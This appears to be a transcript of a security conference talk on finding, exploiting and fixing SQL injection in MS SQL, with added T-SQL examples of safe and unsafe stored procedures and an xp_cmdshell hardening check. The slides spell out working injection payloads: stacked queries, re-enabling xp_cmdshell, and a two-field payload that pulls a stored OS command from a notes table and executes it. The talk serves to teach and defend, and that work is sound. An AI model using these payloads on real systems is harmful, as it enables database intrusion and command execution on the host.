Transcript of The Greatest SQL Injection Ever Told
BE INFORMED. BE STRATEGIC. BE SECURE.
The Greatest SQL Injection Ever Told
Stephen Deck, GSE, OSCE, CISSP
@ranger_cha
OVERVIEW (slide 2)
-What is SQLi?
-Finding SQLi
-Fixing SQLi
-Basic SQLi exploitation
-Advanced SQLi exploitation
-Only covering MS SQL
SQLi OVERVIEW (slide 3)
-SQL Injection
-Attacker provides text that is interpreted as SQL
-Most often on in-line SQL (boring)
-Sometimes on stored procedures and parameterized queries
-Look for "dynamic SQL" for interesting SQLi
-SELECT, INSERT, UPDATE, DELETE are all susceptible
STATIC SQL QUERY (slide 4)
-SELECT COLUMN FROM TABLE WHERE COLUMN LIKE '%INPUT%';
-SELECT ID FROM USERS WHERE USERNAME = 'INPUT' AND PASSWORD = 'INPUT';
-User input only lands in the WHERE clause; the user can't control column names
DYNAMIC SQL (slide 5)
-Create SQL based on user input
-Columns
-Tables
-Filters in WHERE clause
-Common on advanced search pages
EXAMPLE SEARCH PAGE (slide 6)
DYNAMIC SQL (slide 7)
TYPES OF SQL INJECTION (slide 8)
-Normal – see results
-Stacked Queries – '; exec xp_cmdshell 'dir'
-Union-based – ' UNION select column1 from table2;--
-Inferential / Blind – cannot see query results
-Boolean-based – ' or column1 like '%a%';--
-Time-based – '; WAITFOR DELAY '00:00:05';--
-Error-based – ' and 1=db_name();--
IN-LINE SQL (slide 9)
-Database query in app code
-Often vulnerable to SQLi
-Have to rely on regex validation or whitelisting for safety
-Never a good idea
-Infinite length for exploitation
DANGEROUS IN-LINE SQL (slide 10)
SAFE IN-LINE SQL (slide 11)
STORED PROCEDURE (slide 12)
-Clean separation between SQL and user input
-SQL statement stored in the database
-May still be used to build dynamic SQL
-Watch for parameters like WHERE, COLUMN, or TABLE
-Limited length for exploitation
DANGEROUS STORED PROCEDURE (slide 13)
SAFE STORED PROCEDURE (slide 14)
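Added T-SQL example, not code from the slides: a search procedure that builds dynamic SQL from a caller-supplied column name and filter value (the pattern the dangerous stored procedure slide warns about), beside a version that checks the column against the table's real columns and passes the value through sp_executesql as a parameter. The table dbo.users, its columns and the procedure names are assumptions modelled on the deck's test.dbo.users.

```sql
-- Assumed table, modelled on the deck's test.dbo.users (not from the slides).
CREATE TABLE dbo.users (id INT IDENTITY PRIMARY KEY,
                        firstName VARCHAR(50), lastName VARCHAR(50), ssn VARCHAR(12));
GO

-- DANGEROUS: the caller controls a column name and a filter value, and both are
-- concatenated straight into the statement. The value from the WHAT IS HAPPENING?
-- slide, %' or 1=1;--, turns the WHERE into "anything or always true"; a value
-- starting with '; stacks a second statement, since MS SQL supports stacked queries.
CREATE PROCEDURE dbo.SearchUsers_Dangerous @column SYSNAME, @value VARCHAR(50)
AS
BEGIN
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT * FROM dbo.users WHERE ' + @column + N' LIKE ''%' + @value + N'%''';
    EXEC (@sql);   -- user text is now part of the SQL, not data
END
GO

-- SAFE: the column name is validated against sys.columns (a whitelist of what the
-- table actually has) and quoted with QUOTENAME; the value travels as a parameter,
-- so quotes, semicolons and comment markers inside it stay data.
CREATE PROCEDURE dbo.SearchUsers_Safe @column SYSNAME, @value VARCHAR(50)
AS
BEGIN
    IF NOT EXISTS (SELECT 1 FROM sys.columns
                   WHERE object_id = OBJECT_ID(N'dbo.users') AND name = @column)
    BEGIN
        RAISERROR(N'Invalid search column', 16, 1);
        RETURN;
    END
    DECLARE @pattern VARCHAR(52) = '%' + @value + '%';   -- sp_executesql needs a variable
    DECLARE @sql NVARCHAR(MAX) =
        N'SELECT * FROM dbo.users WHERE ' + QUOTENAME(@column) + N' LIKE @pattern';
    EXEC sp_executesql @sql, N'@pattern VARCHAR(52)', @pattern = @pattern;
END
GO

-- Same input to both: the dangerous version returns every row, the safe version
-- only matches last names that literally contain the string ' or 1=1;-- (none).
EXEC dbo.SearchUsers_Dangerous @column = 'lastName', @value = '%'' or 1=1;--';
EXEC dbo.SearchUsers_Safe      @column = 'lastName', @value = '%'' or 1=1;--';
```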
PARAMETERIZED QUERY (slide 15)
-All arguments passed as parameters
-Database can distinguish user data from SQL code
-Usually safe (you can still screw it up)
-Watch for user data not passed as a parameter
SAFE PARAMETERIZED QUERY (slide 16)
-All user data must be in a parameter
DANGEROUS PARAMETERIZED QUERY (slide 17)
FINDING THE SQL INJECTION – NORMAL RESPONSE (slide 18)
FINDING THE SQL INJECTION – BAD RESPONSE (slide 19)
FINDING THE SQL INJECTION – BAD RESPONSE (slide 20)
FINDING THE SQL INJECTION – BAD RESPONSE (slide 21)
FINDING THE SQL INJECTION – BAD RESPONSE (slide 22)
WHAT IS HAPPENING? (slide 23)
-Select * from test.dbo.users where lastName like '%e%'
-Give me all entries from the users table where the last name has an 'e' in it
-Select * from test.dbo.users where lastName like '%' or 1=1;--%'
-Give me all entries from the users table where the last name is anything, or where 1=1 (always true)
STACKED QUERIES (slide 24)
-Use stacked queries
-Multiple queries in one request
-; to separate queries
-Not always supported
-MS-SQL does support it
-MySQL usually does not
-Oracle does not
CODE EXECUTION (slide 25)
-MS-SQL has xp_cmdshell
-Should not be enabled (but still gets turned on)
-We *MIGHT* need it!
-Can re-enable it if the database user is an admin
-EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE
-Others need a user-defined function
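Added T-SQL check, not from the slides: it audits the two conditions this slide chains together (xp_cmdshell enabled, and an application login holding sysadmin that could re-enable it) and applies the corrected settings. The login name webapp is an assumed placeholder for the application's SQL login.

```sql
-- Current state of the switches the slide mentions (value_in_use 1 = enabled).
-- 'show advanced options' must be on before sp_configure will touch xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- Logins that hold sysadmin: any of these can run sp_configure and turn
-- xp_cmdshell back on, which is why an app login must never be in this list.
SELECT sp.name AS login_name
FROM sys.server_role_members rm
JOIN sys.server_principals r  ON r.principal_id  = rm.role_principal_id
JOIN sys.server_principals sp ON sp.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- Remediation: strip sysadmin from the application login (assumed name 'webapp'),
-- then switch xp_cmdshell off and hide the advanced options again.
IF IS_SRVROLEMEMBER('sysadmin', 'webapp') = 1
    ALTER SERVER ROLE sysadmin DROP MEMBER webapp;

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```

After dropping the role, grant the application login only the database-level rights it actually needs; the second SELECT should then no longer list it.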
XP_CMDSHELL – NORMAL COMMAND (slide 26)
-Select * from test.dbo.users where lastName like '%'; exec xp_cmdshell 'ping 127.0.0.1';--%'
-Select all entries from the users table with a last name containing any characters
-Then run the operating system command to ping localhost
XP_CMDSHELL – NORMAL COMMAND (slide 27)
AWKWARD EXPLOITATION (slide 28)
-Length limited to 50 chars for first name and last name
-12 for SSN
-Have to use '' for each '
-Cannot split some strings with /* */
-xp_cmdshell arg
-Reserved words
XP_CMDSHELL – ADD DOMAIN USER (slide 29)
SQLMAP – FAIL (slide 30)
XP_CMDSHELL – ADD DOMAIN USER (slide 31)
-No account created
AWKWARD EXPLOITATION (slide 32)
-Our add-account string was 59 characters
-Found the upper length limit by trial and error
-' or 'AAAAA' = 'AAAAA';-- until we get errors
-Could cut down on command length, but unlimited is nice
-Hard to get files from the internet on Windows
OS COMMAND AS VARIABLE (slide 33)
-Variable won't persist, still limited length
-Not all fields are limited length in most databases
-Find a text field where you can store data and put the OS command in it
-Notes, comments, etc.
OS COMMAND AS VARIABLE (slide 34)
OS COMMAND AS VARIABLE (slide 35)
-Need enough length to read the variable out of the database
-declare @a VARCHAR(999);
-select @a = text from notes where noteId = 3;
-exec xp_cmdshell @a;--
FINAL PAYLOAD (slide 36)
-First Name (50 chars)
-'; declare @a VARCHAR(999);select @a = text from/*
-Last Name (46 chars)
-*/ notes where noteId=3;exec xp_cmdshell @a;--
EXECUTE OS COMMAND (slide 37)
EXECUTE OS COMMAND (slide 38)
WHY IS THIS COOL? (slide 39)
-Limited length
-Sqlmap won't work
-Use /* */ to bridge fields
-Kind of an egg-hunterish feel
-Avoids strings you can't break
-Uses SQL programming info
SUMMARY (slide 40)
-SQL injection is when an attacker "completes" a SQL query with their own code
-SQLMap is not infallible
-Use parameterized queries when possible
-Validate input on dynamic SQL
-When in doubt, lab it out
-People can (and do) screw up stored procedures and parameterized queries
www.directdefense.com (slide 41)